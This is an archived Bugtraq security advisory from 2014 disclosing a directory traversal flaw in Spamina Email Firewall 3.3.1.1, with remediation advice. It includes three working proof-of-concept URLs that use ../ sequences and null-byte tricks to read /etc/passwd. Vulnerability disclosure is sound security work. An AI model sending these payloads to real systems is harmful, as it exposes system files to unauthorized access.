Home page logo
/

bugtraq logo Bugtraq mailing list archives

SPAMINA EMAIL FIREWALL 3.3.1.1 - Directory Traversal -
From: sisco.barrera () gmail com
Date: Tue, 7 Jan 2014 14:57:31 GMT

Vulnerability in the web application of Spamina email firewall.

Vulnerability Type: Directory Traversal

- Original release date: October 3th, 2013
- Last revised: December 9th, 2013
- Discovered by: Sisco Barrera - A2SECURE

Products and affected versions:
SPAMINA EMAIL FIREWALL 3.3.1.1 (maybe other versions also vulnerable)


Vulnerability Discovered by: Sisco Barrera - sisco.barrera () gmail com 
Company: A2SECURE - EspaƱa
A2Secure Website: http://www.a2secure.com
Vendor Website: http://www.spamina.com
Application Website: http://es.spamina.com/es/products.php?pob=CloudEmailFirewall


======================
Background
======================

Spamina is a global leader in offering innovative Cloud-based E-mail & Web security solutions. Our security solutions 
help organizations to instantly secure and manage their information while maintaining compliance and corporate 
policies. Spamina solutions include Cloud Email Firewall, Cloud Email Encryption & DLP, Cloud Email Archiving and Cloud 
Web Security to provide Web traffic filtering.



======================
Vulnerability Details
======================

A directory-traversal attack is based on the premise that web clients are limited to specific directories within the 
Windows files system. The initial directory access by web clients is known as the root directory on a web server. This 
root directory typically stores the home page usually known as Default or Index, as well as other HTML documents for 
the web server. The web server should allow users to access only these specific directories and subdirectories of root. 
However, a directory- traversal attack permits access to other directories within the file system. The encoded version 
of / (slash) in ../ directory traversal request (%2E%2E%2F) seems to be now fixed, after our previous alert.

Spamina should define access rights to private folders on the web server, implement a special characters filtering, 
apply patches and hotfixes.

======================
Proof of Concepts
======================

This URLs just show the directory traversal are this:

https://xxx.xxx.xxx.xxx/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg

https://xxx.xxx.xxx.xxx/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de

https://xxx.xxx.xxx.xxx/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg

======================
Credits/Author
======================

Sisco Barrera
a2secure.com

======================
Disclaimer
======================

All information is provided without warranty. The intent is to provide information to secure infrastructure and/or 
systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages 
that might be caused by using this information.


  By Date           By Thread  

Current thread:
  • SPAMINA EMAIL FIREWALL 3.3.1.1 - Directory Traversal - sisco . barrera (Jan 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]